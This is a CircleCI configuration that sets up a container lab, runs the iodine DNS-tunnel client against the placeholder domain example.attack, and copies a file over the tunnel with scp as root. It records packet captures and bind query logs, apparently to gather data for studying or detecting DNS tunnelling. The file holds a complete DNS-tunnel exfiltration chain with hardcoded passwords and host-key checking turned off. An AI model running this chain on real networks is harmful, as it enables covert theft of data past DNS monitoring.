version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01

    parameters:
      dnstype:
        type: string
      encoding:
        type: string

    environment:
      LOG_DIR: /tmp/logs

    steps:
      - checkout

      - run: mkdir -p $LOG_DIR

      - run:
          name: Start container and verify it's working
          command: |
            set -x
            docker-compose up -d
            docker-compose ps
            sudo apt-get update
            sudo apt install -y tcpdump
            sudo tcpdump -U -s0 -W 10 -C 300 -w $LOG_DIR/pcap_odine-bind9-<< parameters.dnstype >>-<< parameters.encoding >>_ -nn host 172.18.0.3 &
            #pid_tcpdump=$(pidof tcpdump)
            docker exec -d attack_server_1 /usr/sbin/sshd -D
            docker exec -d attack_client_1 iodine -4 -f -P abc123 -T<< parameters.dnstype >> -O<< parameters.encoding >> -r 172.18.0.4 example.attack
            #docker exec -d attack_client_1 iodine -4 -f -P abc123 -Tsrv -Oraw -r 172.18.0.4 example.attack
            docker exec -it attack_client_1 sshpass -p 'root' scp -r -oStrictHostKeyChecking=no root@10.0.0.1:test-file /tmp/
            docker exec -it dns_server_1 mv /var/bind/query.log /tmp/bind/iodine-bind9-<< parameters.dnstype >>-<< parameters.encoding >>-query.log
            sudo chmod -R +rw $LOG_DIR/*
            kill $(ps aux | grep 'tcpdump' | head -n1 | awk '{print $2}') || true
            #docker exec -it dns_server_1 mv /var/bind/pcap_* /tmp/bind/

      - store_artifacts:
          path: /tmp/logs
          destination: raw-dns-logs-<< parameters.dnstype >>-<< parameters.encoding >>
          #destination: dns-logs-{{ var 1 }}

workflows:
  all-iodine-combinations:
    jobs:
      - build:
          matrix:
            parameters:
              dnstype: ['null'] #, srv, cname, txt, private, mx, a]
              encoding: [raw] #, base32, base64, base128]
